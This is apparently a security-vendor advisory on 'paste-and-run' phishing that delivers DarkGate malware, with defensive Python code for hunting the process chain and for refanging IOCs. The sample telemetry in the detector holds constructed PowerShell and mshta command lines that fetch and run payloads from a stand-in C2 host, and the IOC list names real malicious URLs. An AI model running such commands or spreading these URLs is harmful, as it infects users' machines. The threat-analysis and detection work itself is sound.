Beware of Phishing Emails Urging Command Execution through Paste (CTRL+V)

AhnLab SEcurity intelligence Center (ASEC) recently identified phishing emails that carry HTML attachments. When opened, the HTML file instructs the user to paste (CTRL+V) and run a command that the file itself has already placed on the clipboard.

Figure 1. Phishing emails

The emails use subjects such as fee processing and review of operating instructions to get recipients to open the attachment. When the HTML file is opened, it shows a background and a message styled to look like MS Word. The message tells the user to click the “How to fix” button in order to view the Word document offline.

Figure 2. The messages prompting the user to enter the command

Clicking “How to fix” displays instructions to press [Win+R], then [CTRL+V], then [Enter], or alternatively to open a PowerShell terminal and type the command in by hand. At the same time, the JavaScript in the file (see Figure 3) decodes the Base64-encoded PowerShell command (see Figure 4) and writes it to the user’s clipboard, so whatever the user pastes into the Run dialog is the attacker’s command.

Figure 3. Saving the malicious PowerShell command into the user’s clipboard
Figure 4. The Base64-encoded PowerShell command

Once the user follows these steps, the PowerShell command placed on the clipboard is executed (see Figure 5).

Figure 5. Executing the malicious PowerShell script already set in the clipboard

The PowerShell command downloads an HTA file from the C2 server and executes it. It also blanks out the clipboard, apparently to remove the trace of the command that was just run. The HTA in turn executes a PowerShell command hosted on the C2, and Autoit3.exe contained in the downloaded ZIP file is launched with the compiled malicious AutoIt script (script.a3x) as its argument. The overall flow from receipt of the email to infection is shown in Figure 6.

Figure 6. Overall flow

The AutoIt script ultimately loads the DarkGate malware, which infects the system. Users must take extra caution when handling files from unknown sources, in particular URLs and attachments in emails, and should treat any page or document that asks them to press Win+R and paste a command as hostile.
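The chain above leaves a recognisable shape in process-creation telemetry: a shell spawned by explorer.exe (what a Win+R launch looks like) whose command line fetches an .hta and clears the clipboard, followed by mshta.exe, another PowerShell, and Autoit3.exe with an .a3x argument. The following Python is an added example, not ASEC’s code, that tags each event and correlates the parent chain. The event layout mimics Sysmon Event ID 1 fields, the sample events and the command-line text are constructed for illustration (c2.invalid stands in for the real C2 hosts), and the clipboard-clearing forms matched by CLIP_WIPE are assumed, since the post only says the clipboard is blanked.

```python
"""Hunt for the paste-and-run chain in process-creation telemetry.
Added example, not ASEC's code. Fields mimic Sysmon Event ID 1; the
command lines below are constructed, not copied from the samples."""
import re
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the created process
    cmdline: str   # its command line


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# A command line that fetches or launches an .hta, as the pasted command does.
HTA_DL = re.compile(
    r"https?://\S*\.hta\b|\.hta\b.*(downloadstring|downloadfile|iwr|invoke-webrequest)"
    r"|(downloadstring|downloadfile|iwr|invoke-webrequest).*\.hta\b", re.I)
# Clipboard blanking (assumed forms; the post only says the clipboard is cleared).
CLIP_WIPE = re.compile(r"set-clipboard|clear-clipboard|clipboard\]::clear|\bclip(\.exe)?\b", re.I)
A3X = re.compile(r"\.a3x\b", re.I)


def tag_event(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> Set[str]:
    """Per-event indicators. A shell whose parent is explorer.exe is what a
    Win+R launch looks like; on its own that is normal (Start menu does the
    same), so it only counts together with the other indicators."""
    tags: Set[str] = set()
    name = basename(ev.image)
    parent = by_pid.get(ev.ppid)
    if name in SHELLS and parent is not None and basename(parent.image) == "explorer.exe":
        tags.add("shell_from_explorer")
    if HTA_DL.search(ev.cmdline):
        tags.add("hta_download")
    if CLIP_WIPE.search(ev.cmdline):
        tags.add("clipboard_wipe")
    if name == "autoit3.exe" and A3X.search(ev.cmdline):
        tags.add("autoit_a3x")
    return tags


def ancestry(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Walk parent pids upward (leaf first); the seen-set guards against pid reuse."""
    chain, seen = [ev], {ev.pid}
    while ev.ppid in by_pid and ev.ppid not in seen:
        ev = by_pid[ev.ppid]
        seen.add(ev.pid)
        chain.append(ev)
    return chain


def detect(events: List[ProcEvent]) -> List[Tuple[str, int, List[str]]]:
    """Return (rule, pid, root-to-leaf image names) for each hit."""
    by_pid = {e.pid: e for e in events}
    tags = {e.pid: tag_event(e, by_pid) for e in events}
    findings = []
    for e in events:
        t = tags[e.pid]
        lineage = ancestry(e, by_pid)
        names = [basename(x.image) for x in reversed(lineage)]
        # Stage 1: the pasted command itself (HTA fetch and/or clipboard wipe from a Win+R shell).
        if "shell_from_explorer" in t and t & {"hta_download", "clipboard_wipe"}:
            findings.append(("paste_and_run", e.pid, names))
        # Stage 2: AutoIt with a compiled script, descended from that shell through mshta.exe.
        if "autoit_a3x" in t and "mshta.exe" in names and any(
                "shell_from_explorer" in tags[x.pid] for x in lineage):
            findings.append(("darkgate_chain", e.pid, names))
    return findings


# Constructed sample telemetry (not a real capture); c2.invalid stands in for the C2 hosts.
SAMPLE_EVENTS = [
    ProcEvent(1000, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    # Benign: user opened PowerShell from the Start menu. Must not fire.
    ProcEvent(2000, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe"),
    # Pasted into Win+R: launch the HTA, then blank the clipboard.
    ProcEvent(2100, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -w hidden -c \"Start-Process mshta 'http://c2.invalid/dark.hta'; Set-Clipboard -Value ''\""),
    ProcEvent(2200, 2100, r"C:\Windows\System32\mshta.exe", "mshta http://c2.invalid/dark.hta"),
    ProcEvent(2300, 2200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -c \"iwr http://c2.invalid/xcdttafq -OutFile a.zip; Expand-Archive a.zip a; a\\Autoit3.exe a\\script.a3x\""),
    ProcEvent(2400, 2300, r"C:\Users\user\AppData\Local\Temp\a\Autoit3.exe", "Autoit3.exe script.a3x"),
]

if __name__ == "__main__":
    for rule, pid, chain in detect(SAMPLE_EVENTS):
        print(rule, pid, " -> ".join(chain))
```

On the endpoint itself, the pasted text also survives in the Win+R history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth pulling during triage even after the clipboard has been blanked.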

File Detection
Phishing/HTML.ClipBoard.SC199655 (2024.05.21.03)
Downloader/VBS.Generic.SC199642 (2024.05.21.00)
Downloader/VBS.Generic.SC199656 (2024.05.21.03)
Downloader/HTA.DarkGate.SC199621 (2024.05.16.02)
Downloader/PowerShell.Generic (2024.05.21.00)
Downloader/PowerShell.Generic (2024.05.21.02)
Downloader/PowerShell.Generic (2024.05.21.03)
Trojan/AU3.Agent (2024.05.21.00)
Trojan/AU3.Agent (2024.05.21.03)
Trojan/AU3.Agent (2024.05.22.00)

Behavior Detection
Execution/MDP.Powershell.M2514

IOCs (MD5)
8b788345fe1a3e9070e2d2982c1f1eb2 (html)
a66cc0139c199b37a32731592fb3ac0b (header.png)
0b77babfa83bdb4443bb3c5f918545ae (qhsddxna)
404bd47f17d482e139e64d0106b8888d (script.a3x in xcdttafq)
4b653886093a209c3d86cb43d507a53f (html)
30e2442555a4224bf15bbffae5e184ee (dark.hta)
7484931957633b796f165061b0c59794 (rdyjyany)
e0173741b91cabfecd703c20241c1108 (script.a3x in yoomzhda)
318f00b609039588ce5ace3bf1f8d05f (html)
a77becccca5571c00ebc9e516fd96ce8 (1.hta)
f2e4351aa516a1f2e59ade5d9e7aa1d6 (umkglnks)
4d52ea9aa7cd3a0e820a9421d936073f (script.a3x in iinkqrwu)

Download URLs
hxxps://jenniferwelsh[.]com/header.png
hxxp://mylittlecabbage[.]net/qhsddxna
hxxp://mylittlecabbage[.]net/xcdttafq
hxxps://linktoxic34[.]com/wp-content/themes/twentytwentytwo/dark.hta
hxxp://dogmupdate[.]com/rdyjyany
hxxp://dogmupdate[.]com/yoomzhda
hxxps://www.rockcreekdds[.]com/wp-content/1.hta
hxxp://flexiblemaria[.]com/umkglnks
hxxp://flexiblemaria[.]com/iinkqrwu
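Before the IOCs above can go into a blocklist or a hunting query they need refanging and structuring. The following Python is an added example, not ASEC’s tooling; its only input is the hash and URL list exactly as printed in this post. It restores the defanged URLs, extracts the hosts, and joins each hash to the URL it was served from by matching the last word of the hash label (the served file name, which is this list’s labelling convention) against the URL’s path; the three (html) entries are the email attachments and have no URL.

```python
"""Normalise the IOC section of the post. Added example, not ASEC's tooling.
The text below is copied from the post; the only assumption is that the last
word of a hash label is the served file name."""
import re
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

IOC_TEXT = """
8b788345fe1a3e9070e2d2982c1f1eb2 (html)
a66cc0139c199b37a32731592fb3ac0b (header.png)
0b77babfa83bdb4443bb3c5f918545ae (qhsddxna)
404bd47f17d482e139e64d0106b8888d (script.a3x in xcdttafq)
4b653886093a209c3d86cb43d507a53f (html)
30e2442555a4224bf15bbffae5e184ee (dark.hta)
7484931957633b796f165061b0c59794 (rdyjyany)
e0173741b91cabfecd703c20241c1108 (script.a3x in yoomzhda)
318f00b609039588ce5ace3bf1f8d05f (html)
a77becccca5571c00ebc9e516fd96ce8 (1.hta)
f2e4351aa516a1f2e59ade5d9e7aa1d6 (umkglnks)
4d52ea9aa7cd3a0e820a9421d936073f (script.a3x in iinkqrwu)
hxxps://jenniferwelsh[.]com/header.png
hxxp://mylittlecabbage[.]net/qhsddxna
hxxp://mylittlecabbage[.]net/xcdttafq
hxxps://linktoxic34[.]com/wp-content/themes/twentytwentytwo/dark.hta
hxxp://dogmupdate[.]com/rdyjyany
hxxp://dogmupdate[.]com/yoomzhda
hxxps://www.rockcreekdds[.]com/wp-content/1.hta
hxxp://flexiblemaria[.]com/umkglnks
hxxp://flexiblemaria[.]com/iinkqrwu
"""

HASH_LINE = re.compile(r"^([0-9a-f]{32})\s+\((.*)\)$", re.I)   # MD5 followed by a label
DEFANGED_URL = re.compile(r"^hxxps?://\S+$", re.I)


def refang(value: str) -> str:
    """Undo the usual report defanging: hxxp -> http, [.] -> ., [:] -> :."""
    value = re.sub(r"^hxxp", "http", value, flags=re.I)
    return value.replace("[.]", ".").replace("[:]", ":")


def parse_iocs(text: str) -> Tuple[List[Tuple[str, str]], List[str]]:
    """Split the list into (md5, label) pairs and refanged URLs; other lines are ignored."""
    hashes, urls = [], []
    for raw in text.splitlines():
        line = raw.strip()
        m = HASH_LINE.match(line)
        if m:
            hashes.append((m.group(1).lower(), m.group(2)))
        elif DEFANGED_URL.match(line):
            urls.append(refang(line))
    return hashes, urls


def hosts(urls: List[str]) -> List[str]:
    """Distinct hostnames, sorted, for a DNS or proxy blocklist."""
    return sorted({urlsplit(u).hostname for u in urls})


def link_hashes_to_urls(hashes: List[Tuple[str, str]], urls: List[str]) -> Dict[str, str]:
    """Map each md5 to the URL whose path ends in the file name from its label.
    Labels like '(script.a3x in xcdttafq)' name the container last, so the last
    word is used; '(html)' has no matching URL and is left out."""
    by_name = {urlsplit(u).path.rsplit("/", 1)[-1]: u for u in urls}
    linked = {}
    for md5, label in hashes:
        name = label.split()[-1]
        if name in by_name:
            linked[md5] = by_name[name]
    return linked


if __name__ == "__main__":
    hs, us = parse_iocs(IOC_TEXT)
    print("hosts:", ", ".join(hosts(us)))
    for md5, url in link_hashes_to_urls(hs, us).items():
        print(md5, url)
```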

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post Warning Against Phishing Emails Prompting Execution of Commands via Paste (CTRL+V) appeared first on ASEC BLOG.